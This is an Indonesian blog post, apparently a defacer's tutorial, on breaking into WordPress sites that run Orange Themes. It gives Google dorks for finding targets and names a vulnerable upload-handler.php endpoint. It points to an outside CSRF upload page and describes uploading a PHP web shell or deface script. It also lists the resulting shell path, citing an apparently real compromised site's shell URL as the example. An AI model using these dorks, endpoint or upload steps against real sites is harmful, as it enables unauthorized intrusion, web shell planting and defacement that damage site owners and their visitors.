Bahan :
-Dork :
inurl:"/wp-content/themes/agritourismo-theme/
inurl:"/wp-content/themes/bordeaux-theme/
inurl:"/wp-content/themes/bulteno-theme/
inurl:"/wp-content/themes/oxygen-theme/
inurl:"/wp-content/themes/radial-theme/
inurl:"/wp-content/themes/rayoflight-theme/
inurl:"/wp-content/themes/reganto-theme/
inurl:"/wp-content/themes/rockstar-theme/
(kembangin lg bossku biar dpt yg perawan h3h3)
inurl:"/wp-content/themes/bordeaux-theme/
inurl:"/wp-content/themes/bulteno-theme/
inurl:"/wp-content/themes/oxygen-theme/
inurl:"/wp-content/themes/radial-theme/
inurl:"/wp-content/themes/rayoflight-theme/
inurl:"/wp-content/themes/reganto-theme/
inurl:"/wp-content/themes/rockstar-theme/
(kembangin lg bossku biar dpt yg perawan h3h3)
-Exploit : /wp-content/themes/bordeaux-theme/functions/upload-handler.php
-CSRF by ACE666X : http://kedareddy.com/b.php
-KOPI & ROKOK :v
Caranya :
pertama-tama ya dorking dulu lach :v
cari target kemudian tambahkan exploitnya
contoh : target.com/wp-content/themes/bordeaux-theme/functions/upload-handler.php
contoh : target.com/wp-content/themes/bordeaux-theme/functions/upload-handler.php
Vuln = "error" seperti dibawah ini
URL = (masukin target kalian disini)
Postfile = orange_themes
Lalu Klik 'Jepit!1!11', nnti akan muncul tempat upload lalu pilih shell/script deface klean Terus klik 'Cr00t!', kalo succes akan muncul nama file klean
Akses Shell : /wp-content/uploads/tahun/bulan/namafile.php
Contoh : http://www.erwinspleintje.nl/wp-content/uploads/2018/05/1525878701asu.php
Contoh : http://www.erwinspleintje.nl/wp-content/uploads/2018/05/1525878701asu.php
NB : Kalo muncul tulisan "No PHP" coba upload script deface sj
0 Response to "Cara Deface WP Orange Themes"
Post a Comment